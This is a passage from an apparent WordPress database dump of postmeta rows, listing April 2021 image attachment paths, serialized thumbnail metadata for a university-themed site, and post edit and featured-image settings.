:{}}}'),
(27994, 11445, '_wp_attached_file', '2021/04/07046415.jpg'),
(27995, 11445, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046415.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046415-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046415-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046415-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046415-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046415-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27996, 11446, '_wp_attached_file', '2021/04/07046414.jpg'),
(27997, 11446, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046414.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046414-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046414-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046414-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046414-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046414-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27998, 11447, '_wp_attached_file', '2021/04/07046413.jpg'),
(27999, 11447, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046413.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046413-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046413-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046413-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046413-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046413-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28000, 11448, '_wp_attached_file', '2021/04/07046412.jpg'),
(28001, 11448, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046412.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046412-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046412-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046412-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046412-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046412-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28002, 11449, '_wp_attached_file', '2021/04/07046411.jpg'),
(28003, 11449, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046411.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046411-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046411-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046411-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046411-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046411-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28004, 11450, '_wp_attached_file', '2021/04/07046410.jpg'),
(28005, 11450, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046410.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046410-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046410-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046410-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046410-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046410-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28006, 11451, '_wp_attached_file', '2021/04/07046409.jpg'),
(28007, 11451, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046409.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046409-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046409-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046409-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046409-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046409-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28008, 11452, '_wp_attached_file', '2021/04/07046408.jpg'),
(28009, 11452, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046408.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046408-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046408-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046408-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046408-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046408-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28010, 11453, '_wp_attached_file', '2021/04/07046407.jpg'),
(28011, 11453, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046407.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046407-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046407-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046407-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046407-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046407-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28012, 11454, '_wp_attached_file', '2021/04/07046406.jpg'),
(28013, 11454, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046406.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046406-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046406-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046406-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046406-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046406-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28014, 11455, '_wp_attached_file', '2021/04/07046405.jpg'),
(28015, 11455, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046405.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046405-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046405-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046405-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046405-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046405-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28016, 11456, '_wp_attached_file', '2021/04/07046404.jpg'),
(28017, 11456, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046404.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046404-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046404-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046404-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046404-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046404-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28018, 11457, '_wp_attached_file', '2021/04/07046403.jpg'),
(28019, 11457, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046403.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046403-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046403-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046403-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046403-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046403-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28020, 11458, '_wp_attached_file', '2021/04/07046402.jpg'),
(28021, 11458, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046402.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046402-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046402-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046402-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046402-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046402-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28022, 11459, '_wp_attached_file', '2021/04/07046401.jpg'),
(28023, 11459, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046401.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046401-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046401-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046401-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046401-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046401-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28024, 11460, '_edit_lock', '1617783442:14'),
(28025, 11460, '_edit_last', '14'),
(28026, 11461, '_wp_attached_file', '2021/04/07046401-1.jpg'),
(28027, 11461, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:22:\"2021/04/07046401-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"07046401-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"07046401-1-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"07046401-1-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"07046401-1-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"07046401-1-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28028, 11460, '_thumbnail_id', '11459'),
(28031, 11460, '_hide_featured', NULL),
(28034, 11463, '_edit_lock', '1617783475:14'),
(28035, 11463, '_edit_last', '14'),
(28036, 11463, '_thumbnail_id', '11458'),
(28039, 11463, '_hide_featured', NULL),
(28042, 11465, '_edit_lock', '1617783519:14'),
(28043, 11465, '_edit_last', '14'),
(28044, 11465, '_thumbnail_id', '11457'),
(28047, 11465, '_hide_featured', NULL),
(28052, 11467, '_edit_lock', '1617783550:14'),
(28053, 11467, '_edit_last', '14'),
(28054, 11467, '_thumbnail_id', '11456'),
(28057, 11467, '_hide_featured', NULL),
(28060, 11469, '_edit_lock', '1617783593:14'),
(28061, 11469, '_edit_last', '14'),
(28062, 11469, '_thumbnail_id', '11455'),
(28065, 11469, '_hide_featured', NULL),
(28068, 11471, '_edit_lock', '1617783641:14'),
(28069, 11471, '_edit_last', '14'),
(28070, 11471, '_thumbnail_id', '11454'),
(28073, 11471, '_hide_featured', NULL),
(28076, 11473, '_edit_lock', '1617783675:14'),
(28077, 11473, '_edit_last', '14'),
(28078, 11473, '_thumbnail_id', '11453'),
(28081, 11473, '_hide_featured', NULL),
(28084, 11475, '_edit_lock', '1617783728:14'),
(28085, 11475, '_edit_last', '14'),
(28086, 11475, '_thumbnail_id', '11452'),
(28089, 11475, '_hide_featured', NULL),
(28094, 11477, '_edit_lock', '1617783787:14'),
(28095, 11477, '_edit_last', '14'),
(28096, 11477, '_thumbnail_id', '11451'),
(28099, 11477, '_hide_featured', NULL),
(28102, 11479, '_edit_lock', '1617783822:14'),
(28103, 11479, '_edit_last', '14'),
